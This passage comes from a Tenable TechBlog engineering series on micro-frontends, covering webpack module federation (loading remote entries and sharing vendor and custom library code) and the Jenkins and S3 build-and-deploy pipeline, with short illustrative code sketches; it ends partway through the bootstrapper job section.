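```javascript
// Cache of remote entry loads, keyed by URL, so each remoteEntry.js
// script is only ever attached to the page once.
const remoteEntryLoads = new Map();

// Attaches <script src=url> to the page and resolves once it has loaded.
function injectRemoteEntry(doc, url) {
  if (!remoteEntryLoads.has(url)) {
    remoteEntryLoads.set(url, new Promise((resolve, reject) => {
      const script = doc.createElement('script');
      script.src = url;
      script.async = true;
      script.onload = () => resolve();
      script.onerror = () => {
        // Forget the failed attempt so a later call can retry.
        remoteEntryLoads.delete(url);
        reject(new Error(`Failed to load ${url}`));
      };
      doc.head.appendChild(script);
    }));
  }
  return remoteEntryLoads.get(url);
}

// Loads the remote entry, initializes the container and returns the
// requested exposed module.
async function loadRemoteModule({ doc, root, url, scope, module, initSharing, shareScopes }) {
  await injectRemoteEntry(doc, url);
  // Make sure the shared scope (react and friends) is set up first.
  await initSharing('default');
  // The remote entry registers its container as a global named `scope`.
  const container = root[scope];
  await container.init(shareScopes.default);
  const factory = await container.get(module);
  return factory();
}
```

In a React host, a function like loadRemoteModule would typically be wrapped in React.lazy so the micro-app is only requested when its route renders.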

Summary

By making the changes above, we were able to significantly improve our overall performance. We did this by only loading in the code we needed for a given micro-app at the time it was needed (versus everything at once). Additionally, when our team added a new micro-app, our script was capable of handling it automatically. This approach allowed our teams to work more efficiently, and allowed us to significantly reduce the initial load time of our application. See the next article to learn about how we dealt with our vendor libraries.


5. Module Federation — Managing Your Micro-Apps was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

6. Module Federation — Sharing Vendor Code

Module Federation — Sharing Vendor Code

This is post 6 of 9 in the series

  1. Introduction
  2. Why We Implemented a Micro Frontend
  3. Introducing the Monorepo & NX
  4. Introducing Module Federation
  5. Module Federation — Managing Your Micro-Apps
  6. Module Federation — Sharing Vendor Code
  7. Module Federation — Sharing Library Code
  8. Building & Deploying
  9. Summary

Overview

This article focuses on the importance of sharing vendor library code between applications and some related best practices.

The Problem

One of the most important aspects of using module federation is sharing code. When a micro-app gets built, it contains all the files it needs to run. As stated by webpack, “These separate builds should not have dependencies between each other, so they can be developed and deployed individually”. In reality, this means if you build a micro-app and investigate the files, you will see that it has all the code it needs to run independently. In this article, we’re going to focus on vendor code (the code coming from your node_modules directory). However, as you’ll see in the next article of the series, this also applies to your custom libraries (the code living in libs). As illustrated below, App A and B both use vendor lib 6, and when these micro-apps are built they each contain a version of that library within their build artifact.

Why is this important? We’ll use the diagram below to demonstrate. Without sharing code between the micro-apps, when we load in App A, it loads in all the vendor libraries it needs. Then, when we navigate to App B, it also loads in all the libraries it needs. The issue is that we’ve already loaded in a number of libraries when we first loaded App A that could have been leveraged by App B (ex. Vendor Lib 1). From a customer perspective, this means they’re now pulling down a lot more JavaScript than they should be.

The Solution

This is where module federation shines. By telling module federation what should be shared, the micro-apps can now share code between themselves when appropriate. Now, when we load App B, it’s first going to check and see what App A already loaded in and leverage any libraries it can. If it needs a library that hasn’t been loaded in yet (or the version it needs isn’t compatible with the version App A loaded in), then it proceeds to load its own. For example, App A needs Vendor lib 5, but since no other application is using that library, there’s no need to share it.

Sharing code between the micro-apps is critical for performance and ensures that customers are only pulling down the code they truly need to run a given application.

Diving Deeper

Before You Proceed: The remainder of this article is very technical in nature and is geared towards engineers who wish to learn more about sharing vendor code between your micro-apps. If you wish to see the code associated with the following section, you can check it out in this branch.

Now that we understand how libraries are built for each micro-app and why we should share them, let’s see how this actually works. The shared property of the ModuleFederationPlugin is where you define the libraries that should be shared between the micro-apps. Below, we are passing a variable called npmSharedLibs to this property:

If we print out the value of that variable, we’ll see the following:

This tells module federation that the three libraries should be shared, and more specifically that they are singletons: our application could break if a micro-app loaded its own copy of one of them. Setting singleton to true ensures that only one version of the library is loaded (note: this property will not be needed for most libraries). You’ll also notice we set a version, which comes from the version defined for the given library in our package.json file. This is important because anytime we update a library, that version will dynamically change. Libraries only get shared if they have a compatible version. You can read more about these properties here.
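A minimal sketch of how a value like npmSharedLibs could be built from package.json is shown below. The library names and version ranges are illustrative placeholders. The text does not say which key carries the version; this sketch uses requiredVersion, the shared option that accepts a semver range.

```javascript
// Builds the `shared` entries for libraries that must be singletons,
// taking each version range from the package.json dependencies.
function buildNpmSharedLibs(packageJson, singletonNames) {
  const shared = {};
  for (const name of singletonNames) {
    const versionRange = packageJson.dependencies[name];
    if (!versionRange) {
      throw new Error(`${name} is not listed in package.json dependencies`);
    }
    shared[name] = { singleton: true, requiredVersion: versionRange };
  }
  return shared;
}

// Assumption: placeholder dependencies, not the original project's list.
const samplePackageJson = {
  dependencies: {
    react: '^17.0.2',
    'react-dom': '^17.0.2',
    'styled-components': '^5.3.0',
  },
};

const npmSharedLibs = buildNpmSharedLibs(samplePackageJson, [
  'react',
  'react-dom',
  'styled-components',
]);
console.log(npmSharedLibs);
```

Reading the range from package.json means that updating a dependency updates the shared configuration in the same step.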

If we spin up the application and investigate the network traffic with a focus on the react library, we’ll see that only one file gets loaded in and it comes from port 3000 (our Host application). This is a result of defining react in the shared property:

Now let’s take a look at a vendor library that hasn’t been shared yet, called @styled-system/theme-get. If we investigate our network traffic, we’ll discover that this library gets embedded into a vendor file for each micro-app. The three files highlighted below come from each of the micro-apps. You can imagine that as your libraries grow, the size of these vendor files may get quite large, and it would be better if we could share these libraries.

We will now add this library to the shared property:
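As a small sketch, adding a regular (non-singleton) library to an existing shared object might look like this. The helper name and the version range are assumptions; only the library name comes from the text.

```javascript
// Returns a new `shared` object with one more library added. Unlike the
// singleton entries, a regular shared library only needs its version
// range so that compatible copies can be reused across micro-apps.
function shareLibrary(shared, packageJson, name) {
  return {
    ...shared,
    [name]: { requiredVersion: packageJson.dependencies[name] },
  };
}

// Assumption: illustrative version ranges.
const pkg = {
  dependencies: { react: '^17.0.2', '@styled-system/theme-get': '^5.1.2' },
};
const existingShared = {
  react: { singleton: true, requiredVersion: pkg.dependencies.react },
};

const updatedShared = shareLibrary(existingShared, pkg, '@styled-system/theme-get');
console.log(Object.keys(updatedShared)); // [ 'react', '@styled-system/theme-get' ]
```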

If we investigate the network traffic again and search for this library, we’ll see it has been split into its own file. In this case, the Host application (which loads before everything else) loads in the library first (we know this since the file is coming from port 3000). When the other applications load in, they determine that they don’t have to use their own version of this library since it’s already been loaded in.

This very significant feature of module federation is critical for an architecture like this to succeed from a performance perspective.

Summary

Sharing code is one of the most important aspects of using module federation. Without this mechanism in place, your application would suffer from performance issues as your customers pull down a lot of duplicate code each time they access a different micro-app. Using the approaches above, you can ensure that your micro-apps are both independent and capable of sharing code between themselves when appropriate. This is the best of both worlds, and is what allows a micro-frontend architecture to succeed. Now that you understand how vendor libraries are shared, we can take the same principles and apply them to our self-created libraries that live in the libs directory, which we discuss in the next article of the series.


6. Module Federation — Sharing Vendor Code was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

7. Module Federation — Sharing Library Code

Module Federation — Sharing Library Code

This is post 7 of 9 in the series

  1. Introduction
  2. Why We Implemented a Micro Frontend
  3. Introducing the Monorepo & NX
  4. Introducing Module Federation
  5. Module Federation — Managing Your Micro-Apps
  6. Module Federation — Sharing Vendor Code
  7. Module Federation — Sharing Library Code
  8. Building & Deploying
  9. Summary

Overview

This article focuses on the importance of sharing your custom library code between applications and some related best practices.

The Problem

As discussed in the previous article, sharing code is critical to using module federation successfully. In the last article we focused on sharing vendor code. Now, we want to take those same principles and apply them to the custom library code we have living in the libs directory. As illustrated below, App A and B both use Lib 1. When these micro-apps are built, they each contain a version of that library within their build artifact.

Assuming you read the previous article, you now know why this is important. As shown in the diagram below, when App A is loaded in, it pulls down all the libraries shown. When App B is loaded in it’s going to do the same thing. The problem is once again that App B is pulling down duplicate libraries that App A has already loaded in.

The Solution

Similar to the vendor libraries approach, we need to tell module federation that we would like to share these custom libraries. This way once we load in App B, it’s first going to check and see what App A has already loaded and leverage any libraries it can. If it needs a library that hasn’t been loaded in yet (or the version it needs isn’t compatible with the version App A loaded in), then it will proceed to load its own. Otherwise, if it’s the only micro-app using that library, it will simply bundle a version of that library within itself (ex. Lib 2).

Diving Deeper

Before You Proceed: The remainder of this article is very technical in nature and is geared towards engineers who wish to learn more about sharing custom library code between your micro-apps. If you wish to see the code associated with the following section, you can check it out in this branch.

To demonstrate sharing libraries, we’re going to focus on Test Component 1 that is imported by the Host and Application 1:

This particular component lives in the design-system/components workspace:

We leverage the tsconfig.base.json file to build out our aliases dynamically based on the component paths defined in that file. This is an easy way to ensure that as new paths are added to your libraries, they are automatically picked up by webpack:

The aliases in our webpack.config are built dynamically based off the paths in the tsconfig.base.json file
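The alias generation can be sketched as follows, assuming the usual tsconfig shape where compilerOptions.paths maps an alias to an array of file paths. The sample path and the choice to skip wildcard entries are assumptions.

```javascript
const path = require('node:path');

// Turns the `paths` of tsconfig.base.json into a webpack `resolve.alias`
// object, so new library paths are picked up without extra configuration.
function buildAliases(tsconfig, rootDir) {
  const aliases = {};
  const paths = (tsconfig.compilerOptions && tsconfig.compilerOptions.paths) || {};
  for (const [alias, targets] of Object.entries(paths)) {
    // Assumption: wildcard entries such as "@scope/*" are skipped here,
    // because they would need pattern handling that this sketch omits.
    if (alias.includes('*') || targets.length === 0) continue;
    aliases[alias] = path.resolve(rootDir, targets[0]);
  }
  return aliases;
}

// Illustrative tsconfig content; the file path is a placeholder.
const sampleTsconfig = {
  compilerOptions: {
    paths: {
      '@microfrontend-demo/design-system/components': [
        'libs/design-system/components/src/index.ts',
      ],
    },
  },
};

const aliases = buildAliases(sampleTsconfig, process.cwd());
console.log(aliases);
```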

How does webpack currently treat this library code? If we were to investigate the network traffic before sharing anything, we would see that the code for this component is embedded in two separate files specific to both Host and Application 1 (the code specific to Host is shown below as an example). At this point the code is not shared in any way and each application simply pulls the library code from its own bundle.

As your application grows, so does the amount of code you share. At a certain point, it becomes a performance issue when each application pulls in its own unique library code. We’re now going to update the shared property of the ModuleFederationPlugin to include these custom libraries.

Sharing our libraries is similar to the vendor libraries discussed in the previous article. However, the mechanism of defining a version is different. With vendor libraries, we were able to rely on the versions defined in the package.json file. For our custom libraries, we don’t have this concept (though you could technically introduce something like that if you wanted). To solve this problem, we decided to use a unique identifier to identify the library version. Specifically, when we build a particular library, we actually look at the folder containing the library and generate a unique hash based off of the contents of the directory. This way, if the contents of the folder change, then the version does as well. By doing this, we can ensure micro-apps will only share custom libraries if the contents of the library match.

We leverage the hashElement method from folder-hash library to create our hash ID
Each lib now has a unique version based on the hash ID generated
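To illustrate the idea of a content-based version, here is a sketch that hashes a library folder using only Node's built-in crypto and fs modules. It is a stand-in for the folder-hash library mentioned above, not a reproduction of it, and the function names are hypothetical.

```javascript
const crypto = require('node:crypto');
const fs = require('node:fs');
const path = require('node:path');

// Produces a hash that changes whenever any file name or file content
// inside the directory (recursively) changes.
function hashDirectory(dir) {
  const hash = crypto.createHash('sha1');
  const entries = fs
    .readdirSync(dir, { withFileTypes: true })
    // Sort by name so the result does not depend on file system order.
    .sort((a, b) => (a.name < b.name ? -1 : a.name > b.name ? 1 : 0));
  for (const entry of entries) {
    const fullPath = path.join(dir, entry.name);
    hash.update(entry.name);
    if (entry.isDirectory()) hash.update(hashDirectory(fullPath));
    else if (entry.isFile()) hash.update(fs.readFileSync(fullPath));
  }
  return hash.digest('hex');
}

// Maps each library alias to the hash of its folder. The hash would then
// serve as that library's version identifier when it is shared.
function buildLibVersions(libDirs) {
  const versions = {};
  for (const [alias, dir] of Object.entries(libDirs)) {
    versions[alias] = hashDirectory(dir);
  }
  return versions;
}
```

Two micro-apps built from the same library contents get the same identifier, while any change inside the folder produces a different one.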

Note: We are once again leveraging the tsconfig.base.json to dynamically build out the libs that should be shared. We used a similar approach above for building out our aliases.

If we investigate the network traffic again and look for libs_design-system_components (webpack’s filename for the import from @microfrontend-demo/design-system/components), we can see that this particular library has now been split into its own individual file. Furthermore, only one version gets loaded by the Host application (port 3000). This indicates that we are now sharing the code from @microfrontend-demo/design-system/components between the micro-apps.

Going More Granular

Before You Proceed: If you wish to see the code associated with the following section, you can check it out in this branch.

Currently, when we import one of the test components, it comes from the index file shown below. This means the code for all three of these components gets bundled together into one file shown above as “libs_design-system_components_src_index…”.

Imagine that we continue to add more components:

You may get to a certain point where you think it would be beneficial to not bundle these files together into one big file. Instead, you want to import each individual component. Since the alias configuration in webpack is already leveraging the paths in the tsconfig.base.json file to build out these aliases dynamically (discussed above), we can simply update that file and provide all the specific paths to each component:

We can now import each one of these individual components:

If we investigate our network traffic, we can see that each one of those imports gets broken out into its own individual file:

This approach has several pros and cons that we discovered along the way:

Pros

  • Less Code To Pull Down — By making each individual component a direct import and by listing the component in the shared array of the ModuleFederationPlugin, we ensure that the micro-apps share as much library code as possible.
  • Only The Code That Is Needed Is Used — If a micro-app only needs one or two of the components in a library, it isn’t penalized by having to import a large bundle containing more than it needs.

Cons

  • Performance — Bundling, the process of taking a number of separate files and consolidating them into one larger file, is a really good thing. If you continue down the granular path for everything in your libraries, you may very well find yourself importing hundreds of files in the browser. When it comes to browser performance and caching, there’s a balance to strike between loading many small granular files and loading a few larger bundled ones.

We recommend you choose the solution that works best based on your codebase. For some applications, going granular is an ideal solution and leads to the best performance in your application. However, for another application this could be a very bad decision, and your customers could end up having to pull down a ton of granular files when it would have made more sense to only have them pull down one larger file. So as we did, you’ll want to do your own performance analysis and use that as the basis for your approach.

Pitfalls

When it came to the code in our libs directory, we discovered two important things along the way that you should be aware of.

Hybrid Sharing Leads To Bloat — When we first started using module federation, we had a library called tenable-io/common. This was a relic from our initial architecture and essentially housed all the shared code that our various applications used. Since this was originally a directory (and not a library), our imports from it varied quite a bit. As shown below, at times we imported from the main index file of tenable-io/common (tenable-io/common.js), but in other instances we imported from subdirectories (ex. tenable-io/common/component.js) and even specific files (tenable-io/component/component1.js). To avoid updating all of these import statements to use a consistent approach (ex. only importing from the index of tenable-io/common), we opted to expose every single file in this directory and share it via module federation.

To demonstrate why this was a bad idea, we’ll walk through each of these import types: starting from the most global in nature (importing the main index file) and moving towards the most granular (importing a specific file). As shown below, the application begins by importing the main index file which exposes everything in tenable-io/common. This means that when webpack bundles everything together, one large file is created for this import statement that contains everything (we’ll call it common.js).

We then move down a level in our import statements and import from subdirectories within tenable-io/common (components and utilities). Similar to our main index file, these import statements contain everything within their directories. Can you see the problem? This code is already contained in the common.js file above. We now have bloat in our system that causes the customer to pull down more JavaScript than necessary.

We now get to the most granular import statement where we’re importing from a specific file. At this point, we have a lot of bloat in our system as these individual files are already contained within both import types above.

As you can imagine, this can have a dramatic impact on the performance of your application. For us, this was evident in our application early on and it was not until we did a thorough performance analysis that we discovered the culprit. We highly recommend you evaluate the structure of your libraries and determine what’s going to work best for you.
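
To make the duplication concrete, here is a minimal sketch in Python rather than webpack configuration. The bundle and module names are hypothetical stand-ins for the three import styles described above, not our actual files. It simply counts how many emitted bundles each source module ends up in.

```python
from collections import Counter

# Hypothetical bundle contents: each key is a file webpack might emit for one
# import style, each value is the set of source modules bundled into it.
bundles = {
    "common.js": {
        "components/component1.js",
        "components/component2.js",
        "utilities/format.js",
    },
    "common_components.js": {"components/component1.js", "components/component2.js"},
    "common_utilities.js": {"utilities/format.js"},
    "common_components_component1.js": {"components/component1.js"},
}


def duplicated_modules(bundles):
    """Return modules that ship in more than one bundle, with their copy count."""
    counts = Counter(module for modules in bundles.values() for module in modules)
    return {module: copies for module, copies in counts.items() if copies > 1}


duplicates = duplicated_modules(bundles)
for module, copies in sorted(duplicates.items()):
    print(f"{module}: shipped {copies} times")
```

Running a similar count over real build output is one way to spot hybrid sharing before it reaches customers.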

Sharing State/Storage/Theme — While we tried to keep our micro-apps as independent of one another as possible, we did have instances where we needed them to share state and theming. Typically, shared code lives in an actual file (some-file.js) that resides within a micro-app’s bundle. For example, let’s say we have a notifications library shared between the micro-apps. Suppose the presentation portion of this library is updated, but only App B gets deployed to production with the new code. That’s okay because the code is confined to an actual file: App A and App B each use the version within their own bundle. As a result, they can both operate independently without bugs.

However, when it comes to things like state (Redux for us), storage (window.localStorage, document.cookie, etc.) and theming (styled-components for us), you cannot rely on this. This is because these items live in memory and are shared at a global level, which means you can’t rely on them being confined to a physical file. To demonstrate this, let’s say that we’ve made a change to the way state is stored and accessed. Specifically, we went from storing our notifications under an object called notices to storing them under notifications. In this instance, once our applications get out of sync on production (i.e. they’re not leveraging the same version of shared code where this change was made), the applications will attempt to store and access notifications in memory in two different ways. If you are looking to create challenging bugs, this is a great way to do it.
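
The notices versus notifications mismatch can be sketched in a few lines. This is a simplified illustration in Python, with a plain dictionary standing in for the global Redux store; the function names are hypothetical and only exist to show two versions of the shared code touching the same memory.

```python
# A single in-memory store shared by every micro-app on the page
# (a stand-in for a global Redux store).
shared_store = {}


def app_a_add_notification(store, message):
    # App A still runs the OLD shared code: notifications live under "notices".
    store.setdefault("notices", []).append(message)


def app_b_read_notifications(store):
    # App B was deployed with the NEW shared code: it reads "notifications".
    return store.get("notifications", [])


app_a_add_notification(shared_store, "Scan complete")
visible_to_b = app_b_read_notifications(shared_store)
print(visible_to_b)  # App B never sees the notification that App A stored
```

Nothing crashes here, which is what makes this class of bug hard to track down: each app is internally consistent, and the data simply goes missing between them.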

As we soon discovered, most of our bugs/issues resulting from this new architecture came from updating one of these areas (state, theme, storage) and allowing the micro-apps to deploy at their own pace. In these instances, we needed to deploy all the micro-apps at the same time to ensure the applications and the state, storage, and theming were all in sync. You can read more about how we handled this via a Jenkins bootstrapper job in the next article.

Summary

At this point you should have a fairly good grasp on how both vendor libraries and custom libraries are shared in the module federation system. See the next article in the series to learn how we build and deploy our application.


7. Module Federation — Sharing Library Code was originally published in Tenable TechBlog on Medium.

8. Building & Deploying

This is post 8 of 9 in the series

  1. Introduction
  2. Why We Implemented a Micro Frontend
  3. Introducing the Monorepo & NX
  4. Introducing Module Federation
  5. Module Federation — Managing Your Micro-Apps
  6. Module Federation — Sharing Vendor Code
  7. Module Federation — Sharing Library Code
  8. Building & Deploying
  9. Summary

Overview

This article documents the final phase of our new architecture where we build and deploy our application utilizing our new micro-frontend model.

The Problem

If you have followed along up until this point, you can see how we started with a relatively simple architecture. Like a lot of companies, our build and deployment flow looked something like this:

  1. An engineer merges their code to master.
  2. A Jenkins build is triggered that lints, tests, and builds the entire application.
  3. The built application is then deployed to a QA environment.
  4. End-2-End (E2E) tests are run against the QA environment.
  5. The application is deployed to production. In a CI/CD flow, this occurs automatically if the E2E tests pass; otherwise, it is a manual deployment.

In our new flow this would no longer work. In fact, one of our biggest challenges in implementing this new architecture was in setting up the build and deployment process to transition from a single build (as demonstrated above) to multiple applications and libraries.

The Solution

Our new solution involved three primary Jenkins jobs:

  1. Seed Job — Responsible for identifying which applications/libraries need to be rebuilt (via the nx affected command). Once this is determined, its primary purpose is to kick off as many of the next two job types as needed.
  2. Library Job — Responsible for linting and testing any library workspace that was impacted by a change.
  3. Micro-App Jobs — A series of jobs pertaining to each micro-app. Responsible for linting, testing, building, and deploying the micro-app.

With this understanding in place, let’s walk through the steps of the new flow:

Phase 1 — In our new flow, phase 1 includes building and deploying the code to our QA environments where it can be properly tested and viewed by our various internal stakeholders (engineers, quality assurance, etc.):

  1. An engineer merges their code to master. In the diagram below, an engineer on Team 3 merges some code that updates something in their application (Application C).
  2. The Jenkins seed job is triggered, and it identifies what applications and libraries were impacted by this change. This job now kicks off an entirely independent pipeline related to the updated application. In this case, it kicked off the Application C pipeline in Jenkins.
  3. The pipeline now lints, tests, and builds Application C. It’s important to note here how it’s only dealing with a piece of the overall application. This greatly improves the overall build times and avoids long queues of builds waiting to run.
  4. The built application is then deployed to the QA environments.
  5. End-2-End (E2E) tests are run against the QA environments.
  6. Our deployment is now complete. For our purposes, we felt that a manual deployment to production was a safe approach for us and one that still offered us the flexibility and efficiency we needed.
Phase 1 Highlighted — Deploying to QA environments

Phase 2 — This phase (shown in the diagram after the dotted line) occurs when an engineer is ready to deploy their code to production:

  1. An engineer deploys their given micro-app to staging. In this case, the engineer would go into the build for Application C and deploy from there.
  2. For our purposes, we deploy to a staging environment before production to perform a final spot check on our application. In this type of architecture, some bugs only surface because of the decoupled nature of your micro-apps. You can read more about this type of issue in the previous article under the Sharing State/Storage/Theme section. This final staging environment allows us to catch these issues before they make their way to production.
  3. The application is then deployed to production.
Phase 2 Highlighted — Deploying to production environments

While this flow has more steps than our original one, we found that the pros outweigh the cons. Our builds are now more efficient as they can occur in parallel and only have to deal with a specific part of the repository. Additionally, our teams can now move at their own pace, deploying to production when they see fit.

Diving Deeper

Before You Proceed: The remainder of this article is very technical in nature and is geared towards engineers who wish to learn the specifics of how we build and deploy our applications.

Build Strategy

We will now cover the three job types introduced above in more detail: the seed job, the library job, and the micro-app jobs.

The Seed Job

This job is responsible for first identifying which applications/libraries need to be rebuilt. How is this done? This is where the NX framework, introduced in a previous article, comes full circle. By taking advantage of this framework, we created a system by which we could identify which applications and libraries (our “workspaces”) were impacted by a given change in the system (via the nx affected command). Leveraging this functionality, the build logic was updated to include a Jenkins seed job. A seed job is a normal Jenkins job that runs a Job DSL script; the script, in turn, contains instructions that create and trigger additional jobs. In our case, these included micro-app jobs and/or a library job, which we’ll discuss in detail later.

Jenkins Status — An important aspect of the seed job is to provide a visualization for all the jobs it kicks off. All the triggered application jobs are shown in one place along with their status:

  • Green — Successful build
  • Yellow — Unstable
  • Blue — Still processing
  • Red (not shown) — Failed build

GitHub Status — Since multiple independent Jenkins builds are triggered for the same commit ID, we had to pay attention to how the changes are represented in GitHub so that we would not lose visibility of broken builds in the PR process. Each job registers itself with a unique context in GitHub, providing feedback on which sub-job failed directly in the PR process:

Performance, Managing Dependencies — Before a given micro-app and/or library job can perform its necessary steps (lint, test, build), it needs to install the necessary dependencies for those actions (those defined in the package.json file of the project). Doing this every single time a job is run is very costly in terms of resources and performance. Since all of these jobs need the same dependencies, it makes much more sense if we can perform this action once so that all the jobs can leverage the same set of dependencies.

To accomplish this, the node execution environment was dockerised with all necessary dependencies installed inside a container. As shown below, the seed job maintains the responsibility for keeping this container in sync with the required dependencies. The seed job determines if a new container is required by checking if changes have been made to package.json. If changes are made, the seed job generates the new container prior to continuing any further analysis and/or build steps. The jobs that are kicked off by the seed (micro-app jobs and the library job) can then leverage that container for use:

This approach led to the following benefits:

  • It proved to be much faster than downloading all development dependencies for each build (step) every time they were needed.
  • The pre-populated container reduced the load on the internal Nexus repository manager as well as the network traffic.
  • It allowed us to run the various build steps (lint, unit test, package) in parallel, further improving the build times.
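
The package.json check that drives the container rebuild can be sketched as follows. This is a minimal illustration in Python, not our Jenkins code: it assumes the check is done by comparing a content hash of package.json with a fingerprint recorded when the current container was built. The function names and sample manifests are hypothetical.

```python
import hashlib


def dependency_fingerprint(package_json_text: str) -> str:
    """Hash the package.json contents so any change yields a new fingerprint."""
    return hashlib.sha256(package_json_text.encode("utf-8")).hexdigest()[:12]


def needs_new_container(package_json_text: str, image_fingerprint: str) -> bool:
    """True when package.json no longer matches the fingerprint baked into the image."""
    return dependency_fingerprint(package_json_text) != image_fingerprint


old_manifest = '{"dependencies": {"react": "17.0.2"}}'
new_manifest = '{"dependencies": {"react": "17.0.2", "lodash": "4.17.21"}}'

# Fingerprint recorded when the current container was built.
image_fingerprint = dependency_fingerprint(old_manifest)

unchanged = needs_new_container(old_manifest, image_fingerprint)
changed = needs_new_container(new_manifest, image_fingerprint)
print(unchanged, changed)
```

Only when the check reports a change does the seed job pay the cost of a full dependency install; every downstream job then reuses the resulting container.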

Performance, Limiting The Number Of Builds Run At Once — To facilitate the smooth operation of the system, the seed jobs on master and feature branch builds use slightly different logic with respect to the number of builds that can be kicked off at any one time. This is necessary as we have a large number of active development branches and triggering excessive jobs can lead to resource shortages, especially with required agents. When it comes to the concurrency of execution, the differences between the two are:

  • Master branch — Commits immediately trigger all builds concurrently.
  • Feature branches — Allow only one seed job per branch to avoid system overload as every commit could trigger 10+ sub jobs depending on the location of the changes.

Another way we reduce the number of builds generated is in how the nx affected command is used by the master branch versus the feature branches:

  • Master branch — The command is run against the latest tag created for each application build. Each master / production build produces a tag of the form APP<uniqueAppId>_<buildversion>. This is used to determine if the specific application needs to be rebuilt based on the changes.
  • Feature branches — We use master as a reference for the first build on the feature branch, and any subsequent build will use the commit-id of the last successful build on that branch. This way, we are not constantly rebuilding all applications that may be affected by a diff against master, but only the applications that are changed by the commit.
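
The two rules above boil down to choosing a base ref for nx affected. The sketch below is written in Python for illustration; the function names, the sample tag, and the choice of the affected:apps sub-command are assumptions rather than our actual Job DSL logic. The --base and --head flags follow the Nx CLI, but check them against the Nx version you use.

```python
from typing import List, Optional


def affected_base(
    branch: str,
    latest_app_tag: Optional[str],
    last_successful_commit: Optional[str],
) -> str:
    """Pick the git ref that `nx affected` should diff against."""
    if branch == "master":
        # Master compares against the latest tag produced for this application.
        if latest_app_tag is None:
            # Assumption for this sketch: a master build always has a prior tag.
            raise ValueError("master builds need a previous application tag")
        return latest_app_tag
    # Feature branches: the first build diffs against master, later builds diff
    # against the last successful build on the same branch.
    return last_successful_commit or "master"


def affected_command(base: str, head: str = "HEAD") -> List[str]:
    """Build the CLI invocation as an argument list (nothing is executed here)."""
    return ["nx", "affected:apps", f"--base={base}", f"--head={head}"]


first_feature_build = affected_base("feature/login", None, None)
later_feature_build = affected_base("feature/login", None, "abc123")
master_build = affected_base("master", "APP12_345", None)
print(affected_command(later_feature_build))
```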

To summarize the role of the seed job, the diagram below showcases the logical steps it takes to accomplish the tasks discussed above.

The Library Job

We will now dive into the jobs that the seed job kicks off, starting with the library job. As discussed in our previous articles, our applications share code from a libs directory in our repository.

Before we go further, it’s important to understand how library code gets built and deployed. When a micro-app is built (ex. nx build host), its deployment package contains not only the application code but also all the libraries that it depends on. When we build the Host and Application 1, it creates a number of files starting with “libs_…” and “node_modules…”. This demonstrates how all the shared code (both vendor libraries and your own custom libraries) needed by a micro-app is packaged within (i.e. the micro-apps are self-reliant). While it may look like your given micro-app is extremely bloated in terms of the number of files it contains, keep in mind that a lot of those files may not actually get leveraged if the micro-apps are sharing things appropriately.

This means building the actual library code is a part of each micro-app’s build step, which is discussed below. However, if library code is changed, we still need a way to lint and test that code. If you kicked off 5 micro-app jobs, you would not want each of those jobs to perform this action as they would all be linting and testing the exact same thing. Our solution to this was to have a separate Jenkins job just for our library code, as follows:

  1. Using the nx affected:libs command, we determine which library workspaces were impacted by the change in question.
  2. Our library job then lints/tests those workspaces. In parallel, our micro-apps also lint, test and build themselves.
  3. Before a micro-app can finish its job, it checks the status of the libs build. As long as the libs build was successful, it proceeds as normal. Otherwise, all micro-apps fail as well.

The Micro-App Jobs

Now that you understand how the seed and library jobs work, let’s get into the last job type: the micro-app jobs.

Configuration — As discussed previously, each micro-app has its own Jenkins build. The build logic for each application is implemented in a micro-app specific Jenkinsfile that is loaded at runtime for the application in question. The pattern for these small snippets of code looks something like the following:

The jenkins/Jenkinsfile.template (leveraged by each micro-app) defines the general build logic for a micro-application. The default configuration in that file can then be overwritten by the micro-app:

This approach allows all our build logic to be in a single place, while easily allowing us to add more micro-apps and scale accordingly. This combined with the job DSL makes adding a new application to the build / deployment logic a straightforward and easy to follow process.

Managing Parallel Jobs — When we first implemented the build logic for the jobs, we attempted to implement as many steps as possible in parallel to make the builds as fast as possible, which you can see in the Jenkins parallel step below:

After some testing, we found that linting + building the application together takes about as much time as running the unit tests for a given product. As a result, we combined the two steps (linting, building) into one (assets-build) to optimize the performance of our build. We highly recommend you do your own analysis, as this will vary per application.

Deployment Strategy

Now that you understand how the build logic works in Jenkins, let’s see how things actually get deployed.

Checkpoints — When an engineer is ready to deploy their given micro-app to production, they use a checkpoint. Upon clicking into the build they wish to deploy, they select the checkpoints option. As discussed in our initial flow diagram, we force our engineers to first deploy to our staging environment for a final round of testing before they deploy their application to production.

The particular build in Jenkins that we wish to deploy
The details of the job above where we have the ability to deploy to staging via a checkpoint

Once approval is granted, the engineer can then deploy the micro-app to production using another checkpoint:

The build in Jenkins that was created after we clicked deployToQAStaging
The details of the job above where we have the ability to deploy to production via a checkpoint

S3 Strategy — The new logic required a rework of the whole deployment strategy as well. In our old architecture, the application was deployed as a whole to a new S3 location and then the central gateway application was informed of the new location. This forced the clients to reload the entire application as a whole.

Our new strategy reduces the deployment impact to the customer by only updating the code on S3 that actually changed. This way, whenever a customer pulls down the code for the application, they are pulling a majority of the code from their browser cache and only updated files have to be brought down from S3.

One thing we had to be careful about was ensuring the index.html file is only updated after all the granular files are pushed to S3. Otherwise, we run the risk of our updated application requesting files that may not have made their way to S3 yet.
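
The ordering constraint can be sketched as a small planning step. This is an illustration in Python and not our deployment script: it assumes each file has a content hash available locally and for the copy already on S3. The file names and hashes are hypothetical.

```python
from typing import Dict, List


def plan_upload(
    local_hashes: Dict[str, str],
    remote_hashes: Dict[str, str],
    entry_point: str = "index.html",
) -> List[str]:
    """Return the changed files in upload order, with the entry point last."""
    changed = [
        path
        for path, digest in local_hashes.items()
        if remote_hashes.get(path) != digest
    ]
    assets = sorted(path for path in changed if path != entry_point)
    # index.html references the new asset names, so it goes up only after them.
    return assets + ([entry_point] if entry_point in changed else [])


local = {
    "index.html": "h3",
    "main.9f2c.js": "h1",
    "libs_design-system.41ab.js": "h2",
    "vendor.77aa.js": "h0",
}
remote = {"index.html": "h9", "vendor.77aa.js": "h0", "main.1b3d.js": "hx"}

upload_order = plan_upload(local, remote)
print(upload_order)
```

The unchanged vendor file is skipped entirely, so browsers keep serving it from cache, and index.html is pushed only once everything it points to is already in place.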

Bootstrapper Job — As discussed above, micro-apps are typically deployed to an environment via an individual Jenkins job:

However, we ran into a number of instances where we needed to deploy all micro-apps at the same time. This included the following scenarios:

  • Shared state — While we tried to keep our micro-apps as independent of one another as possible, we did have instances where we needed them to share state. When we made updates to these areas, we could encounter bugs when the apps got out of sync.
